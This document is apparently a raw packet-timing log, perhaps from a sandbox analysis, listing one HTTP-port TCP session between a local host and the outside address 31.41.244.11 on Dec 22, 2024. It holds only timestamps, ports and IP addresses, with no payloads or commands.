Dec 22, 2024 02:16:13.553087950 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.553107977 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.553123951 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.553132057 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.553181887 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.553617001 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.553668022 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.554183960 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.554238081 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.554356098 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.554404974 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.559372902 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.559437037 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.559448957 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.559487104 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.559499979 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.559525013 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.559539080 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.559562922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.559578896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.559603930 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.559617043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.559653044 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.560226917 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.560282946 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.560296059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.560333014 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.560709000 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.560759068 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.560836077 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.560887098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.562093973 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.562144041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.562218904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.562268019 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.563431025 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.563488960 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.563582897 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.563635111 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.564810991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.564866066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.564948082 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.564999104 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.566164970 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.566222906 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.566287041 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.566339970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.567517042 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.567626953 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.567641020 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.567692995 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.568901062 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.568954945 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.569020987 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.569077015 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.570221901 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.570277929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.586194038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.586249113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.586255074 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.586297989 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.586489916 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.586529016 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.586543083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.586581945 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.587857962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.587910891 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.587913036 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.587965965 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.589205027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.589260101 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.589261055 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.589304924 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.590331078 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.590389013 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.590441942 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.590492010 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.591665983 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.591717005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.591793060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.591836929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.593095064 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.593149900 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.593208075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.593255043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.594412088 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.594476938 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.594521999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.594561100 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.595773935 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.595824003 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.595875025 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.595916986 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.597143888 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.597189903 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.597316980 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.597413063 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.598503113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.598553896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.598620892 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.598670006 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.599852085 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.599901915 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.599976063 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.600025892 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.601224899 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.601284981 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.601356030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.601397991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.602607965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.602669001 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.602726936 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.602768898 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.603959084 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.604008913 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.604088068 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.604134083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.605319977 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.605370045 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.605443001 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.605489969 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.606677055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.606726885 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.606792927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.606842041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.608048916 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.608104944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.608172894 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.608269930 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.609426022 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.609492064 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.609517097 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.609565973 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.610780954 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.610873938 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.610874891 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.610925913 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.612127066 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.612176895 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.612251043 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.612301111 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.613522053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.613573074 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.613646984 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.613693953 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.614886999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.614945889 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.615000010 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.615056038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.616241932 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.616302013 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.616329908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.616375923 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.617602110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.617654085 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.617728949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.617784023 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.618973017 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.619024038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.619103909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.619210958 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.620326042 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.620379925 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.620455980 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.620512009 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.621711016 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.621764898 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.621817112 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.621865034 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.623110056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.623164892 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.623239040 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.623301029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.624425888 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.624489069 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.624541044 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.624587059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.625783920 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.625833035 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.625906944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.625965118 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.627149105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.627199888 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.627274036 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.627334118 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.628550053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.628606081 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.628643990 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.628688097 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.629880905 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.629934072 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.630007982 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.630099058 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.642986059 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.643109083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.643114090 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.643213987 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.643300056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.643372059 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.643388987 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.643435955 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.644520044 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.644579887 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.644612074 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.644669056 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.645796061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.645853043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.645931959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.645984888 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.647140980 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.647248983 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.647267103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.647344112 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.648499012 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.648555994 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.648602009 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.648652077 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.649861097 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.649921894 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.649977922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.650038958 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.651223898 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.651297092 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.651391029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.651448965 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.652590990 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.652647018 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.652719975 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.652781963 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.653973103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.654073954 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.654082060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.654135942 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.655359030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.655404091 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.655467987 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.655513048 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.656699896 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.656761885 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.656796932 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.656846046 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.658046961 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.658113003 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.658155918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.658205032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.659429073 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.659488916 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.659512997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.659560919 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.660806894 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.660856962 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.660919905 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.660969019 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.662149906 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.662201881 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.662266016 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.662323952 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.663516998 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.663582087 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.663674116 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.663724899 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.664884090 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.664983034 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.664985895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.665034056 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.666276932 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.666342020 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.666374922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.666428089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.667548895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.667610884 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.778043032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.778095961 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.778136969 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.778215885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.778301954 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.778338909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.778610945 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.778673887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.778675079 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.778723001 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.779068947 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.779130936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.779213905 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.779252052 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.779269934 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.779308081 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.779975891 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.780030012 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.780121088 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.780158997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.780175924 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.780203104 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.780874014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.780927896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.780978918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.781021118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.781038046 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.781073093 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.781737089 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.781799078 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.781864882 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.781900883 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.781913996 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.781954050 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.782646894 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.782701015 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.782752037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.782788992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.782805920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.782835007 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.783523083 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.783576965 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.783643007 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.783679008 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.783691883 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.783723116 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.784399033 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.784444094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.784524918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.784560919 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.784573078 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.784609079 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.785290956 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.785341978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.785409927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.785446882 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.785459995 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.785495043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.786174059 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.786222935 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.786288977 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.786325932 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.786335945 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.786372900 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.787069082 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.787123919 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.787198067 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.787234068 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.787255049 CET	49765	80	192.168.2.4	31.41.244.11
